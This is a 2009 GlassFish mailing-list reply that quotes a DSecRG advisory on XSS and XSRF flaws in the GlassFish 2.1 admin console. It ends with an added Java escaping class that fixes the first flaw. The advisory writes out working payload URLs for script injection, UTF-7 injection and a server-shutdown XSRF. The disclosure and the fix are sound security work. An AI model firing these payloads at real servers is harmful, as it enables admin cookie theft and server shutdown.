dev@glassfish.java.net

Re: [DSECRG] Sun Glassfish Multiple Security Vulnerabilities

From: Shreedhar Ganapathy <Shreedhar.Ganapathy_at_Sun.COM>
Date: Thu, 19 Mar 2009 07:15:29 -0700

Thank you for looking into these and reporting them to us. We will
investigate these and try to address them as soon as possible.

Thanks
Shreedhar

DSecRG wrote:
> Hello, we are security researchers from Digital Security company
> [http://dsecrg.com].
> We found a critical vulnerability in your system Sun Glassfish Enterprise Server.
>
> This advisory is being provided to you under the policy documented at
> http://dsecrg.com/files/DSPolicy_en.pdf. We recommend that you read this policy; however, in the interim, you have 7 days to respond to this initial email. This policy encourages open communication, and we look forward to working with you on resolving the problem detailed below.
>
>
>
> Digital Security Research Group [DSecRG] Advisory #DSECRG-09-0
>
>
> Application: Sun Glassfish Enterprise Server
> Versions Affected: 2.1
> Vendor URL: https://glassfish.dev.java.net/
> Bug: Multiple XSS and XSRF Vulnerabilities
> Exploits: YES
> Reported: 18.03.2009
> Vendor response: ..2009
> Solution: ..
> Date of Public Advisory: ..
> CVE-numbers: ..
> Author: Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)
>
>
>
> Description
> ***********
>
> 1. Glassfish Server Admin Console multiple XSS vulnerabilities.
> 2. Glassfish Server Admin Console shutdown server XSRF vulnerability.
>
>
>
> Details
> *******
>
> 1. Glassfish Server Admin Console multiple XSS vulnerabilities.
>
> Using this vulnerability, an attacker can steal the admin's cookie and then
> authenticate as administrator or perform certain administrative
> actions.
>
> 1.1 Multiple Linked XSS vulnerabilities.
>
> Many pages have a typical XSS vulnerability.
>
> An attacker can inject XSS into the URL string.
>
> Example:
>
> http://[server]/applications/applications.jsf?');};alert("DSecRG_XSS");</script><!--
> http://[server]/configuration/configuration.jsf?');};alert("DSecRG_XSS");</script><!--
> http://[server]/customMBeans/customMBeans.jsf?');};alert("DSecRG_XSS");</script><!--
> http://[server]/resourceNode/resources.jsf?');};alert("DSecRG_XSS");</script><!--
> http://[server]/sysnet/registration.jsf?');};alert("DSecRG_XSS");</script><!--
> http://[server]/webService/webServicesGeneral.jsf?');};alert("DSecRG_XSS");</script><!--
>
> Response HTML Code:
> -------------------
> #################################################
>
> ...
> <script type="text/javascript">
> var myonload = new Object();
> myonload.oldonload = window.onload;
> myonload.newonload = function() {
> if ('/applications/applications.jsf?');};alert("DSecRG_XSS");</script><!--' != '') {
> ...
>
> #################################################
>
>
> 1.2 Multiple Linked XSS vulnerabilities in 404 Error page.
>
> An attacker can inject XSS into the URL string using UTF-7 encoding.
>
> Exploiting this issue requires Auto-Select encoding in the browser
> configuration.
>
> Example:
>
> http://[server]/theme/META-INF/>+ACJ-+AD4APB-SCRIPT+AD7-alert(+ACI-DSecRG_XSS+ACI-)+ADz-/SCRIPT+AD7-
>
>
> 1.3 Multiple Linked XSS vulnerabilities in GET parameter "name".
>
> Many pages have a typical XSS vulnerability in the GET parameter "name".
>
> An attacker can inject XSS into the URL string.
>
> Example:
>
> http://[server]/configuration/auditModuleEdit.jsf?name=<IMG SRC=javascript:alert('DSecRG_XSS')>
> http://[server]/configuration/httpListenerEdit.jsf?name=<IMG SRC=javascript:alert('DSecRG_XSS')>&configName=server-config
> http://[server]/resourceNode/jdbcResourceEdit.jsf?name=<IMG SRC=javascript:alert('DSecRG_XSS')>
>
>
> ---------------------------------------------------------------------
>
>
> 2. Glassfish Server Admin Console shutdown server XSRF vulnerability.
>
> Exploiting this issue allows a remote attacker to shut down the server.
>
> Example:
>
> http://[server]/applications/applications.jsf?<script>document.location.href="http://[server]/shutdown.jsf";</script>
>
>
>
> About
> *****
>
> Digital Security is a leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services, and certification for the ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems, with vulnerability reports, advisories and whitepapers posted regularly on our website.
>
>
> Contact: research [at] dsecrg [dot] com
> http://www.dsecrg.com
> http://www.dsec.ru
>
>
> Regards,
> Digital Security Research Group [DSecRG]
> ________________________________________
> DIGITAL SECURITY
> tel/fax: +7(812)703-1547
> tel: +7(812)430-9130
> e-mail: research_at_dsecrg.com
> web: www.dsecrg.com
>
>
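The first XSS example in the advisory works because the request URI is written into a single-quoted JavaScript string literal with no escaping, so `');};` closes the literal and `</script><!--` ends the script. As an added example (not GlassFish's own code), the Java class below shows the escaping a server should apply before emitting that literal; `JsStringEscaper` and `renderOnloadSnippet` are names chosen here, and `main` feeds it the advisory's own payload as a constructed input.

```java
/** Escapes untrusted text for placement inside a single-quoted JavaScript string literal. */
public final class JsStringEscaper {

    /** Returns s with every character outside [A-Za-z0-9 ,._] replaced by a \xHH or \uHHHH escape. */
    public static String escapeForJsString(String s) {
        StringBuilder out = new StringBuilder(s.length() * 2);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            if ((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || (c >= '0' && c <= '9')
                    || c == ' ' || c == ',' || c == '.' || c == '_') {
                out.append(c);
            } else if (c < 256) {
                // Quotes, backslash, '<', '>', '/' and ';' all land here, so neither the
                // JS literal nor the enclosing <script> element can be closed early.
                out.append(String.format("\\x%02X", (int) c));
            } else {
                out.append(String.format("\\u%04X", (int) c));
            }
        }
        return out.toString();
    }

    /** Rebuilds the onload snippet from the advisory's response, escaping the URI first. */
    public static String renderOnloadSnippet(String requestUri) {
        return "<script type=\"text/javascript\">\n"
             + "var myonload = new Object();\n"
             + "myonload.oldonload = window.onload;\n"
             + "myonload.newonload = function() {\n"
             + "if ('" + escapeForJsString(requestUri) + "' != '') {\n"
             + "/* ... */ } };\n"
             + "</script>";
    }

    public static void main(String[] args) {
        // Constructed input: the request URI from the advisory's first example (item 1.1).
        String uri = "/applications/applications.jsf?');};alert(\"DSecRG_XSS\");</script><!--";
        String html = renderOnloadSnippet(uri);
        System.out.println(html);
        // Neither the breakout sequence nor the premature close tag survives escaping.
        if (html.contains("');};") || html.contains("</script><!--")) {
            throw new AssertionError("escaping failed");
        }
    }
}
```

The same rule applies to the `name` parameter in item 1.3, except that there the sink is HTML body context, so an HTML entity encoder is the right escaper rather than this JavaScript-string one.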
>
>